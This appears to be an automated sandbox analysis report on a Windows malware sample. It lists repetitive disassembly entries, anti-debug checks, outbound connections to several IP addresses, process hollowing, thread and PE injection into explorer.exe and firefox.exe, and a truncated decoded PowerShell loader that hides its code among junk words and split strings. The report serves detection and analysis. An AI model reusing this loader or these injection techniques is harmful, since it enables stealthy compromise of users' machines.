      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FFDF4 mov eax, dword ptr fs:[00000030h]7_2_1E6FFDF4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FFDF4 mov eax, dword ptr fs:[00000030h]7_2_1E6FFDF4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FFDF4 mov eax, dword ptr fs:[00000030h]7_2_1E6FFDF4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FFDF4 mov eax, dword ptr fs:[00000030h]7_2_1E6FFDF4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FFDF4 mov eax, dword ptr fs:[00000030h]7_2_1E6FFDF4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64EDFA mov eax, dword ptr fs:[00000030h]7_2_1E64EDFA
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70ADD6 mov eax, dword ptr fs:[00000030h]7_2_1E70ADD6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70ADD6 mov eax, dword ptr fs:[00000030h]7_2_1E70ADD6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E648DCD mov eax, dword ptr fs:[00000030h]7_2_1E648DCD
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E646DA6 mov eax, dword ptr fs:[00000030h]7_2_1E646DA6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E657DB6 mov eax, dword ptr fs:[00000030h]7_2_1E657DB6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E682DBC mov eax, dword ptr fs:[00000030h]7_2_1E682DBC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E682DBC mov ecx, dword ptr fs:[00000030h]7_2_1E682DBC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64DDB0 mov eax, dword ptr fs:[00000030h]7_2_1E64DDB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E724DA7 mov eax, dword ptr fs:[00000030h]7_2_1E724DA7
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64CD8A mov eax, dword ptr fs:[00000030h]7_2_1E64CD8A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64CD8A mov eax, dword ptr fs:[00000030h]7_2_1E64CD8A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E656D91 mov eax, dword ptr fs:[00000030h]7_2_1E656D91
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71BA66 mov eax, dword ptr fs:[00000030h]7_2_1E71BA66
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71BA66 mov eax, dword ptr fs:[00000030h]7_2_1E71BA66
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71BA66 mov eax, dword ptr fs:[00000030h]7_2_1E71BA66
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71BA66 mov eax, dword ptr fs:[00000030h]7_2_1E71BA66
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64FA44 mov ecx, dword ptr fs:[00000030h]7_2_1E64FA44
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E689A48 mov eax, dword ptr fs:[00000030h]7_2_1E689A48
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E689A48 mov eax, dword ptr fs:[00000030h]7_2_1E689A48
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67EA40 mov eax, dword ptr fs:[00000030h]7_2_1E67EA40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67EA40 mov eax, dword ptr fs:[00000030h]7_2_1E67EA40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6DDA40 mov eax, dword ptr fs:[00000030h]7_2_1E6DDA40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6EAA40 mov eax, dword ptr fs:[00000030h]7_2_1E6EAA40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6EAA40 mov eax, dword ptr fs:[00000030h]7_2_1E6EAA40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D4A57 mov eax, dword ptr fs:[00000030h]7_2_1E6D4A57
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D4A57 mov eax, dword ptr fs:[00000030h]7_2_1E6D4A57
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70DA30 mov eax, dword ptr fs:[00000030h]7_2_1E70DA30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E651A24 mov eax, dword ptr fs:[00000030h]7_2_1E651A24
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E651A24 mov eax, dword ptr fs:[00000030h]7_2_1E651A24
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67DA20 mov eax, dword ptr fs:[00000030h]7_2_1E67DA20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67DA20 mov eax, dword ptr fs:[00000030h]7_2_1E67DA20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67DA20 mov eax, dword ptr fs:[00000030h]7_2_1E67DA20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67DA20 mov eax, dword ptr fs:[00000030h]7_2_1E67DA20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67DA20 mov eax, dword ptr fs:[00000030h]7_2_1E67DA20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67DA20 mov edx, dword ptr fs:[00000030h]7_2_1E67DA20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647A30 mov eax, dword ptr fs:[00000030h]7_2_1E647A30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647A30 mov eax, dword ptr fs:[00000030h]7_2_1E647A30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647A30 mov eax, dword ptr fs:[00000030h]7_2_1E647A30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6DDA31 mov eax, dword ptr fs:[00000030h]7_2_1E6DDA31
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68AA0E mov eax, dword ptr fs:[00000030h]7_2_1E68AA0E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68AA0E mov eax, dword ptr fs:[00000030h]7_2_1E68AA0E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E659AE4 mov eax, dword ptr fs:[00000030h]7_2_1E659AE4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64FAEC mov edi, dword ptr fs:[00000030h]7_2_1E64FAEC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E650AED mov eax, dword ptr fs:[00000030h]7_2_1E650AED
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E650AED mov eax, dword ptr fs:[00000030h]7_2_1E650AED
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E650AED mov eax, dword ptr fs:[00000030h]7_2_1E650AED
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E670AEB mov eax, dword ptr fs:[00000030h]7_2_1E670AEB
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E670AEB mov eax, dword ptr fs:[00000030h]7_2_1E670AEB
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E670AEB mov eax, dword ptr fs:[00000030h]7_2_1E670AEB
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663AF6 mov eax, dword ptr fs:[00000030h]7_2_1E663AF6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663AF6 mov eax, dword ptr fs:[00000030h]7_2_1E663AF6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663AF6 mov eax, dword ptr fs:[00000030h]7_2_1E663AF6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663AF6 mov eax, dword ptr fs:[00000030h]7_2_1E663AF6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663AF6 mov eax, dword ptr fs:[00000030h]7_2_1E663AF6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D0AFF mov eax, dword ptr fs:[00000030h]7_2_1E6D0AFF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D0AFF mov eax, dword ptr fs:[00000030h]7_2_1E6D0AFF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D0AFF mov eax, dword ptr fs:[00000030h]7_2_1E6D0AFF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E724AE8 mov eax, dword ptr fs:[00000030h]7_2_1E724AE8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67DAC0 mov eax, dword ptr fs:[00000030h]7_2_1E67DAC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67DAC0 mov eax, dword ptr fs:[00000030h]7_2_1E67DAC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67DAC0 mov eax, dword ptr fs:[00000030h]7_2_1E67DAC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67DAC0 mov eax, dword ptr fs:[00000030h]7_2_1E67DAC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67DAC0 mov eax, dword ptr fs:[00000030h]7_2_1E67DAC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67DAC0 mov eax, dword ptr fs:[00000030h]7_2_1E67DAC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660ACE mov eax, dword ptr fs:[00000030h]7_2_1E660ACE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660ACE mov eax, dword ptr fs:[00000030h]7_2_1E660ACE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6F7ABE mov eax, dword ptr fs:[00000030h]7_2_1E6F7ABE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E689ABF mov eax, dword ptr fs:[00000030h]7_2_1E689ABF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E689ABF mov eax, dword ptr fs:[00000030h]7_2_1E689ABF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E689ABF mov eax, dword ptr fs:[00000030h]7_2_1E689ABF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70DAAF mov eax, dword ptr fs:[00000030h]7_2_1E70DAAF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64BA80 mov eax, dword ptr fs:[00000030h]7_2_1E64BA80
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E706A80 mov eax, dword ptr fs:[00000030h]7_2_1E706A80
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E706B77 mov eax, dword ptr fs:[00000030h]7_2_1E706B77
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E684B79 mov eax, dword ptr fs:[00000030h]7_2_1E684B79
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65AB70 mov eax, dword ptr fs:[00000030h]7_2_1E65AB70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65AB70 mov eax, dword ptr fs:[00000030h]7_2_1E65AB70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65AB70 mov eax, dword ptr fs:[00000030h]7_2_1E65AB70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65AB70 mov eax, dword ptr fs:[00000030h]7_2_1E65AB70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65AB70 mov eax, dword ptr fs:[00000030h]7_2_1E65AB70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65AB70 mov eax, dword ptr fs:[00000030h]7_2_1E65AB70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E724B67 mov eax, dword ptr fs:[00000030h]7_2_1E724B67
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E656B70 mov eax, dword ptr fs:[00000030h]7_2_1E656B70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E656B70 mov eax, dword ptr fs:[00000030h]7_2_1E656B70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E656B70 mov eax, dword ptr fs:[00000030h]7_2_1E656B70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647B7D mov eax, dword ptr fs:[00000030h]7_2_1E647B7D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647B7D mov ecx, dword ptr fs:[00000030h]7_2_1E647B7D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6DFB45 mov eax, dword ptr fs:[00000030h]7_2_1E6DFB45
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70BB40 mov ecx, dword ptr fs:[00000030h]7_2_1E70BB40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70BB40 mov eax, dword ptr fs:[00000030h]7_2_1E70BB40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68BB5B mov esi, dword ptr fs:[00000030h]7_2_1E68BB5B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6DDB2A mov eax, dword ptr fs:[00000030h]7_2_1E6DDB2A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68CB20 mov eax, dword ptr fs:[00000030h]7_2_1E68CB20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6DCB20 mov eax, dword ptr fs:[00000030h]7_2_1E6DCB20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6DCB20 mov eax, dword ptr fs:[00000030h]7_2_1E6DCB20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6DCB20 mov eax, dword ptr fs:[00000030h]7_2_1E6DCB20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E691B0F mov eax, dword ptr fs:[00000030h]7_2_1E691B0F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E691B0F mov eax, dword ptr fs:[00000030h]7_2_1E691B0F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E658B10 mov eax, dword ptr fs:[00000030h]7_2_1E658B10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E658B10 mov eax, dword ptr fs:[00000030h]7_2_1E658B10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E658B10 mov eax, dword ptr fs:[00000030h]7_2_1E658B10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6DDB1B mov eax, dword ptr fs:[00000030h]7_2_1E6DDB1B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660B10 mov eax, dword ptr fs:[00000030h]7_2_1E660B10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660B10 mov eax, dword ptr fs:[00000030h]7_2_1E660B10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660B10 mov eax, dword ptr fs:[00000030h]7_2_1E660B10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660B10 mov eax, dword ptr fs:[00000030h]7_2_1E660B10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64CB1E mov eax, dword ptr fs:[00000030h]7_2_1E64CB1E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67EB1C mov eax, dword ptr fs:[00000030h]7_2_1E67EB1C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661BE7 mov eax, dword ptr fs:[00000030h]7_2_1E661BE7
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661BE7 mov eax, dword ptr fs:[00000030h]7_2_1E661BE7
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E685BE0 mov eax, dword ptr fs:[00000030h]7_2_1E685BE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E685BE0 mov eax, dword ptr fs:[00000030h]7_2_1E685BE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E724BE0 mov eax, dword ptr fs:[00000030h]7_2_1E724BE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647BF0 mov eax, dword ptr fs:[00000030h]7_2_1E647BF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647BF0 mov ecx, dword ptr fs:[00000030h]7_2_1E647BF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647BF0 mov eax, dword ptr fs:[00000030h]7_2_1E647BF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E647BF0 mov eax, dword ptr fs:[00000030h]7_2_1E647BF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64EBC0 mov eax, dword ptr fs:[00000030h]7_2_1E64EBC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67FBC0 mov ecx, dword ptr fs:[00000030h]7_2_1E67FBC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67FBC0 mov eax, dword ptr fs:[00000030h]7_2_1E67FBC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67FBC0 mov eax, dword ptr fs:[00000030h]7_2_1E67FBC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67FBC0 mov eax, dword ptr fs:[00000030h]7_2_1E67FBC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67FBC0 mov eax, dword ptr fs:[00000030h]7_2_1E67FBC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68BBC0 mov eax, dword ptr fs:[00000030h]7_2_1E68BBC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68BBC0 mov eax, dword ptr fs:[00000030h]7_2_1E68BBC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68BBC0 mov ecx, dword ptr fs:[00000030h]7_2_1E68BBC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68BBC0 mov eax, dword ptr fs:[00000030h]7_2_1E68BBC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D4BC0 mov eax, dword ptr fs:[00000030h]7_2_1E6D4BC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D4BC0 mov eax, dword ptr fs:[00000030h]7_2_1E6D4BC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D4BC0 mov eax, dword ptr fs:[00000030h]7_2_1E6D4BC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D4BC0 mov eax, dword ptr fs:[00000030h]7_2_1E6D4BC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFBC2 mov eax, dword ptr fs:[00000030h]7_2_1E6CFBC2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6F6BDE mov ebx, dword ptr fs:[00000030h]7_2_1E6F6BDE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6F6BDE mov eax, dword ptr fs:[00000030h]7_2_1E6F6BDE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E678BD1 mov eax, dword ptr fs:[00000030h]7_2_1E678BD1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E678BD1 mov eax, dword ptr fs:[00000030h]7_2_1E678BD1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E653BA4 mov eax, dword ptr fs:[00000030h]7_2_1E653BA4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E653BA4 mov eax, dword ptr fs:[00000030h]7_2_1E653BA4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E653BA4 mov eax, dword ptr fs:[00000030h]7_2_1E653BA4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E653BA4 mov eax, dword ptr fs:[00000030h]7_2_1E653BA4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E718BBE mov eax, dword ptr fs:[00000030h]7_2_1E718BBE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E718BBE mov eax, dword ptr fs:[00000030h]7_2_1E718BBE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E718BBE mov eax, dword ptr fs:[00000030h]7_2_1E718BBE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692E50 NtCreateSection,LdrInitializeThunk,7_2_1E692E50

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 35.155.7.183 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.117.11.104 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 166.88.142.63 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.22 80Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 154.201.220.155 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.77.55.161 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.83.27.102 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 168.206.212.12 80Jump to behavior
      Sample uses process hollowing technique
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: 9F0000Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF776A50000Jump to behavior
      Encrypted powershell cmdline option found
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Naturfagen Trophonuc Achond Luftkvalit Cycl tetchedud Para Supple Subtitle Access Paral Overpon gyne Redefine Materi Chainmakin spiru Leve weftag Forsynings Indskydnin Tranmi Skraverin Turn Maskin Tstsco Assumingly Nattevandr Skil #Akinetete Unexp phosphor Forb Unconti Plat Fund Confucian Medaljevi Sporst Dioramaskn #Amni Lovrevisio hartalree Klbvitr Stenochr Skovspurve Chondro Hudgen Pruttenr Mythise Omkrs Aquicult $MasterMind = [char]34 + "N" + "tAl" + "loc" + "ate"+"Vi" + "rtual" + "Memory" + [char]34#Engroove megal Nonf Tunings Sjlegladli Sankt Pamper Predispa Ephe Arma Dehornin Gossip Bustlers Obispant Nonpaci Applicer Fidoster Linj Homicul Tvivlraa Bidra ugenpolst Skemaform Halvabenp Lysi alterca Yalelaasbl Endogsaafo Calciofer Jobbeskri Torereeru Rett Perl #Udsk Katastrofe Hyperm Skytsh Aftalt Have Butterdejs Frba Catopt Ignorance Outbul Melbou Misti Smde Unlod Oven Reobse Opbr Brddeg Hydatidoce Dentifrice Acro Inexp Seksk Unde Hype Giftekni Omdoeb Skaerm Ninetedu Edite Omkost Slders #Degener Hyperhid Alfgyps Ribazubain Daydawn Pras Subcom Unprobi Infusershe Spectreli Vellykket infant Pejlstokk Gaussfilt Artif Saline valfa Fist Pleurosti clanswome Inhabile Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Decapitat1{[DllImport("kernel32")]public static extern void SleepEx(int Bradysp0);[DllImport("user32")]public static extern void GetWindowDC();[DllImport("ntdll", EntryPoint=$Ma
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Naturfagen Trophonuc Achond Luftkvalit Cycl tetchedud Para Supple Subtitle Access Paral Overpon gyne Redefine Materi Chainmakin spiru Leve weftag Forsynings Indskydnin Tranmi Skraverin Turn Maskin Tstsco Assumingly Nattevandr Skil #Akinetete Unexp phosphor Forb Unconti Plat Fund Confucian Medaljevi Sporst Dioramaskn #Amni Lovrevisio hartalree Klbvitr Stenochr Skovspurve Chondro Hudgen Pruttenr Mythise Omkrs Aquicult $MasterMind = [char]34 + "N" + "tAl" + "loc" + "ate"+"Vi" + "rtual" + "Memory" + [char]34#Engroove megal Nonf Tunings Sjlegladli Sankt Pamper Predispa Ephe Arma Dehornin Gossip Bustlers Obispant Nonpaci Applicer Fidoster Linj Homicul Tvivlraa Bidra ugenpolst Skemaform Halvabenp Lysi alterca Yalelaasbl Endogsaafo Calciofer Jobbeskri Torereeru Rett Perl #Udsk Katastrofe Hyperm Skytsh Aftalt Have Butterdejs Frba Catopt Ignorance Outbul Melbou Misti Smde Unlod Oven Reobse Opbr Brddeg Hydatidoce Dentifrice Acro Inexp Seksk Unde Hype Giftekni Omdoeb Skaerm Ninetedu Edite Omkost Slders #Degener Hyperhid Alfgyps Ribazubain Daydawn Pras Subcom Unprobi Infusershe Spectreli Vellykket infant Pejlstokk Gaussfilt Artif Saline valfa Fist Pleurosti clanswome Inhabile Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Decapitat1{[DllImport("kernel32")]public static extern void SleepEx(int Bradysp0);[DllImport("user32")]public static extern void GetWindowDC();[DllImport("ntdll", EntryPoint=$MaJump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF776A50000 value starts with: 4D5AJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)
